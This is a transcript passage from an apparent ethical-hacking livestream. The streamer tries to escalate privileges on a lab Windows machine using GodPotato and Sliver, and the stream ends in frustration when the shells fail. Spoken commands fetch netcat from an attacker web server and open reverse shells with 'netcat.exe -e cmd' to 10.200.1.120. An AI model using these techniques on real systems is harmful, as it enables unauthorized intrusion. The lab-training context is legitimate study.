godpotato.exe. All right, cross our fingers, hit enter. Something might be happening. I don't see it catching any sessions though. I probably just broke the machine. Okay, I'm gonna go ahead and say I did not do that correctly. It's like frozen. And I'm not catching any sessions. I do have a listener on 444. Let's try this. Did I just like break the freaking machine? Okay, no, I'm still here. Internet went down in Siberia. Okay. Can I do like dir? I can't do dir ctemp. Now I'm curious. Can I just run? Can I just get a shell as that other user then? That's another way that we could do this. I'm not dir. I just want to run it. Okay. So that works. We can get a session now as that user. So we'll drop into this session. And you can see we are now the NT Service MS SQL SQL Express user. Let me get a drink of water. Now I'm just curious, does God Potato actually work? We can also look for the Armory. So the Armory is a bunch of extensions built into Sliver that we can install. I don't know if there's any potato stuff in the Armory. I'm going to very quickly look. You guys tell me if you see anything with potatoes. Because we could try to do it from Sliver. I see no impersonate stuff. All right. We can also just try get system. I don't think that's going to work. No, okay, I didn't think so. All right, well, we have the session as NT service. If I drop into a shell and go to C user or C temp rather, we can see God Potato right there. How do we run God Potato? Let's just see if it actually works. If I just run godpotato.exe -cmd. Okay, current user, NT authority system. Did that just kill my shell? No, there we got it. So we do have access as NT authority system. All right, I have other ways of doing this. Let's go over to our web server. I don't know why I wouldn't catch it in Sliver, but if I do locate netcat.exe, I'm going to go ahead and grab netcat, save it to this folder, spin up my Python web server again, and then go over to this, and I'm going to do a wget 10.200.1.120 netcat.exe-o netcat.exe. I'm going to spin up a classic 1337 web shell. Go over to this right here. And I can't do the up command, but let me just grab this. And I think what might work, paste this in, but instead of who am I, what if I do, I don't know if I just specify the path. If I do netcat.exe-e cmd potentially 10.200.1.120 1337, something like that. And let's, is my listener on? Where'd I even put my listener? Okay, we have a listener there. Nothing. Okay, that's odd. So clearly God Potato works, but I can't get it to actually give me a stable shell. Is my syntax incorrect? If you have another implant, can you run it with Go Potato? I'm pretty sure when using XP command shell, you need to use quotes. Well, see, I'm not even using it now. Whoops. So godpotato.exe works, cmd, and if we look at the syntax, all of that works. We could, here, I have another way of doing it, maybe. Well, jeez, I don't know why I'm getting tripped up on this. Sanity check again, it fully works, godpotato works. Why can I not execute netcat.exe with godpotato and get a shell? Yeah, we can try just running netcat.exe here. Let's give this a shot. I'm just going to grab this so I have the syntax. And I'm actually going to do it up here. This is the beauty, though, of ethical hacking, guys. It's like, this should work, but I'm missing one small thing. And then you spend the rest of the time like trying to figure out what rabbit hole you're in and how to fix it so you can get command execution. So what if I just do this instead? Let's give that a shot. Nothing. That is so odd. Current user's INTI authority system. It should be working. Let's try a few other things. Can I get this to execute? I like the reality of these videos. Troubleshooting and Googling, exactly. What does this look like? Oh, wow, I don't know. It's not gonna like our string there. We could go like this, though. So if we change this to our IP, 10.200.1.120, 1337, and we copy this, and we'll save it as PowerShell reverse shell.ps1. And we save it there, go back over to this guy, and do wget Well, if you try to run command.exe, I mean, we have code execution. I just want to get an actual stable shell. Oh, not like that, Tyler. I tell you what, guys. I'm struggling. I meant to run God Potato and then run that. So let me grab God Potato again. One of these times I'll eventually get it. So if we do like, well, I don't know if this will work. Probably not. Guys, this is going to kill me. I don't understand why nothing seems to work for me. And now I just broke it again. Did I really screw up the freaking shell now? Oh, okay. Things are broken, guys. I broke the machine. I am not touching the keyboard right now. Yeah, we could just add a user account. But I'm curious why these shells aren't working. Now everything's just broken. I can't do anything. Wow. All right, let's try. Is this somewhere? I don't know why that... I don't know if my netcat is wrong. My netcat's broken. My netcat sucks. Or what it is. Let me try that. Because netcat should work. Let me grab a new binary for netcat. And then I'm going to go back to trying to use netcat. Because everything else I'm doing is failing. So we're gonna go back to the old reliable tools that should work. Do we not have binaries? Where the frick are the netcat binaries stored at? I'll just download some random crap from GitHub. YOLO it. Well, I think this one should have binaries. Oh, it's right here. Jeez. All right. Go to my web server. I'm going to copy it from my downloads. All right, I'll try that Avi if this doesn't work. Let me try a good old working netcat64.exe and go back over to our session. And let me spin up the web server one more time. HTTP 10.200.1.120 netcat64.exe netcat64.exe. What the frick is going on? There we go. What? My like shell here thing is broken. No. Oh, Sliver's not open. No. I'm just struggling at the very end here. Okay, I think I need to reset my box. Which is going to be annoying. Okay, no, we have command execution, but it's really slow. Here's what I'm going to try. If I do XP command shell, I'm going to do curl, grab my IP 201.120 netcat64.exe, and I'm going to save it to Windows temp netcat64.exe like so. It's going to be my last attempt before I just get mad. Oh my goodness. Please just download the file. Okay, downloaded the file. Good, good, good. All right, now what I want to try to do is we'll do XP command shell. Windows, temp. And what if we do from here? Let's just get a, no, let's just do this. If I do netcat64.exe, and then is it dash E CMD 10.200.1.120 1337. Can I at least get this to work? Sanity check here. What do you mean it's being used by another process? Oh, jeez, I'm struggling, guys. I might have to redo this whole recording at this point. And Netcat 64, it doesn't. What? Why is it blank? I don't even know what to do right here. I don't even know what to say. Well, it's not sessions. I already did that. I think I like fully screwed up this session. Can I actually run commands now? No, like look how freaking broken it is. Did I change it to Windows Temp? Is that where I saved it? Why would I do that? Let me try something real quick. Oh wait, I can't do that. I'm not even the freaking thing. Let me get a new session as the NT service real quick. Is it really going to keep being incredibly slow in the shell? Because it wasn't like this initially when I was trying to get stuff working. Check the... I don't have Discord open. Oh my goodness, guys. This... I really don't know what's going on here. Well, guys, this might just be a sign to call it a night and count my losses. I have too much to get done that I don't have time to screw around with this to try to get it working. I mean, like, look how incredibly slow it is. Like, I somehow screwed up this session or this shell or something. Like, it should not be this slow. It was working until I broke it. It's Sliver being buggy. I broke my session. Oh, wait. Netcat64.exe before was blank, and now there's stuff there. Right? Do you guys remember that? Let me go ahead. I'm gonna try this. Like, this is the last time I'm trying it, and then I'm quitting for the night because it's just pissing me off at this point. And then I'll end up just having to record this offline or something so I can get the series done. But I got too many projects to be able to mess with this. So let's see what happens. If I do netcat64.exe -e cmd 10.200.1.120 Everyone pray right now. All right. I do not know. I am did I typo it? Did I do a typo? It took a lot of time. Oh, I do have a typo. You guys are right. Oh my goodness. Stupid freaking non-stable crappy shell. We're not hacking anything, Tabo. I just freaking suck at life and I should quit everything I'm doing. Nope, I'm done, guys. I'm too pissed off. I'm done messing with this. I'm calling it a night. I got too many other projects to work on. I cannot waste my time spending 45 freaking minutes troubleshooting this. So, I'll be back tomorrow, but I'm not going to be back tonight. I have more projects that I need to do, and I do not have the time or the patience to troubleshoot this. I'm going to have to re-record this offline because I need to get it done. But yeah, this is what hacking is like, guys. It's getting pissed off at something that that should be working. But it is what it is. We take what we can get. Yeah, I'm going to sign off, guys. I'm not even going to find someone to raid. I don't feel like pulling up the raid stuff. You guys go find somebody else to watch. I will be back on tomorrow night. Hopefully things go smoother tomorrow night. But if you want to continue working on this lab, I think you have another hour. But I'm done with this. You guys have a good night. I'll be back tomorrow night. Hopefully things go smoother tomorrow night before I'm leave IT entirely and go like work at Sam's Club again like I used to. But you guys have a good night. I'll catch you in the next one. Oh, and yeah, I don't know why the frick my audio isn't working either with the audio spike. A lot of things pissing me off tonight. So I'm going to go troubleshoot my audio, then work on projects. I probably need a day off at some point in time. But you guys have a good night.